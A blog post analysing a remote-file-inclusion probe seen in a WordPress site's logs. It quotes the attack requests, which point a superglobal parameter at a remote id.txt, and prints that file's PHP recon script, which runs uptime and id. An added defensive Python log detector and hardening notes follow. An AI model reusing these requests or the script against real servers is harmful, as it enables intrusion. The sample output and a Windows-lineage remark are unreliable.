Wordpress hack

One day I felt the need for some insight into this blog's visitors. From the immense list of available plugins I chose StatPress. Very nice, and all kinds of nice-to-knows popped up in the admin. Among them were three odd entries like:

July 10, 2008	02:06:36	218.38.18.31	_SERVER[SCRIPT_FILENAME]=http:...	Windows 2000

Mmm, probably a script kiddie with too much time on its hands. However, this needs more investigation … in my logs I found the complete requests:

218.38.18.31 - - [10/Jul/2008:02:06:33 +0200] "GET /2008/07/multiple-unlimited-php-versions-on-an-single-debian-apache-server/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 9638 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:34 +0200] "GET /?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 54974 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:35 +0200] "GET /2008/07/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 18301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ok, StatPress is accurate about that :) For those who don't know: Windows 2000 actually is NT 5.0; after all, it is the successor of Windows NT (New Technology) 4.0, which is the successor of Windows for Workgroups 3.x, etc. So Windows Server 2003 is basically NT 5.2. I wonder what Windows Server 2008 is called…

Anyway, a GET request with a URL pointing at altervista.org/id.txt dumped into ?_SERVER[SCRIPT_FILENAME] … if I'm correct, a PHP server should parse this as $_SERVER[SCRIPT_FILENAME], generating a warning or notice about an assumed constant SCRIPT_FILENAME, which will be set to altervista.org/id.txt?, and supposedly including and parsing this id.txt thingie?? That is, if register_globals is on … right??
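As an added example (not code from the original post, from StatPress or from the script the probe fetched), here is a small Python detector that runs over the three access-log lines quoted above and follows the reasoning of the previous paragraph: it splits each query-parameter name the way PHP does (`_SERVER[SCRIPT_FILENAME]` becomes the superglobal `$_SERVER` with key `SCRIPT_FILENAME`), flags names that would shadow a PHP superglobal under register_globals, and flags values that are remote URLs, which is what an include() with allow_url_include on would fetch. The three probe lines in the block are copied from this post; the fourth, benign request and its 192.0.2.10 address are constructed so the detector has something it must not flag.

```python
"""Flag register_globals / remote-inclusion probes in an Apache combined log.

Added example; not part of the original post. SAMPLE_LOG is constructed:
the first three lines copy the requests quoted in the post, the fourth is
a benign request used as a negative control.
"""
import re
from urllib.parse import parse_qsl

SAMPLE_LOG = """\
218.38.18.31 - - [10/Jul/2008:02:06:33 +0200] "GET /2008/07/multiple-unlimited-php-versions-on-an-single-debian-apache-server/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 9638 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:34 +0200] "GET /?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 54974 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.38.18.31 - - [10/Jul/2008:02:06:35 +0200] "GET /2008/07/?_SERVER[SCRIPT_FILENAME]=http://test12356.altervista.org/id.txt? HTTP/1.1" 200 18301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
192.0.2.10 - - [10/Jul/2008:02:07:01 +0200] "GET /2008/07/?s=debian+apache HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Apache "combined" format:
#   ip ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Variables that a request parameter could shadow when register_globals is on.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                "_ENV", "_REQUEST", "_SESSION"}

# Stream wrappers that make include()/require() read from somewhere other
# than the local file system (only reachable with allow_url_include on).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def php_var_name(param):
    """Split a PHP-style parameter name into base name and bracket keys.

    '_SERVER[SCRIPT_FILENAME]' -> ('_SERVER', ['SCRIPT_FILENAME'])
    's'                        -> ('s', [])
    """
    m = re.match(r"^([^\[]*)((?:\[[^\]]*\])*)", param)
    base, rest = m.group(1), m.group(2)
    keys = re.findall(r"\[([^\]]*)\]", rest)
    return base, keys


def inspect_request(target):
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    _, _, query = target.partition("?")
    # parse_qsl percent-decodes names and values, so encoded brackets are seen too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base, keys = php_var_name(name)
        if base in SUPERGLOBALS:
            path = "".join("[%s]" % k for k in keys)
            findings.append("superglobal override attempt: $%s%s" % (base, path))
        if value.lower().startswith(REMOTE_SCHEMES):
            findings.append("remote URL in parameter %r: %r" % (name, value))
    return findings


def scan_log(text):
    """Parse combined-format lines and return only the suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would count these
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["target"])
        for finding in hit["findings"]:
            print("    ", finding)
```

The 200 in these lines only says WordPress rendered the page; it does not show that the include ever ran, which matches the observation later in this post that the payload could not be made to work here. On the PHP side the settings that keep this class of probe harmless are register_globals = Off (the default since PHP 4.2 and removed entirely in PHP 5.4) together with allow_url_include = Off (available since PHP 5.2), so a request parameter can neither shadow $_SERVER nor hand a remote URL to include().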

Let's get this file with lynx http://test12356.altervista.org/id.txt?

<?php
// Formats a byte count by the number of digits it has (the script's own, rough, scale).
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }

        return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "kungkang";
$un = @php_uname();
// system() prints the command output directly before returning its last line,
// which is why uptime and id appear twice in the output further down.
$up = system('uptime');
$id1 = system('id');
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
// $SERVER_ADDR only exists with register_globals on; otherwise it is unset,
// hence the empty "server-ip:" line in the output below.
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "kungkang was here ..";
echo "uname -a: $un";
echo "os: $os";
echo "uptime: $up";
echo "id: $id1";
echo "pwd: $pwd1";
echo "php: $php1";
echo "software: $sof1";
echo "server-name: $name1";
echo "server-ip: $ip1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;

Looks like a real phpinfo() ;) It doesn't look too harmful, but WordPress and Joomla should both be targets. It also looks outdated, because I couldn't get this thing to work, even with globals registered. The output it should have generated:

kungkang
304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21 uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis) kungkang was here ..
uname -a: Fedora blog.virtec.org 2.2.18-5-%86-bigmem #1 SMP Tue Dec 18 22:34:10 UTC 2007 i686
os: Linux
uptime: 304:25:03 up 32100 days, 8:59, 254 users, load average: 28.05, 45.15, 44.21
id: uid=651(nt5-iis) gid=651(nt5-iis) groups=651(nt5-iis)
pwd: /var/htdocs/www/publish_http/
php: 5.0.6-0.FC.3
software: Apache
server-name: blog.virtec.org
server-ip:
free: 346128.63 Gb
used: 16342.80 Gb
total: 234591.44 Gb

This guy seems to be from Indonesia and has a nice tag on http://www.strenna online.com/. I advise you to disable JavaScript before visiting; however, you won't be able to view his animation then.

More information: whois strenna online.com

There are a million ways to inject everything into anything… and it will always be that way. If you're looking for some protection, check out:

http://www.modsecurity.org/
ModSecurity is a web application firewall that can work either embedded or as a reverse proxy. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.

http://www.phpwact.org/security/attack/catalog?s=script%20filename%20injection
A Catalog of Security Attacks: methods of attacking a web application from the attacker's perspective, and how to prevent each attack from the application developer's perspective.

July 10th, 2008 - Posted in thingies

2 Responses to ' Wordpress hack '

  1. fitoemisee said,

    on September 28th, 2008 at 9:39 pm

    favorited this one, bro

  2. trargecraree said,

    on October 9th, 2008 at 10:25 am

    thank you, brother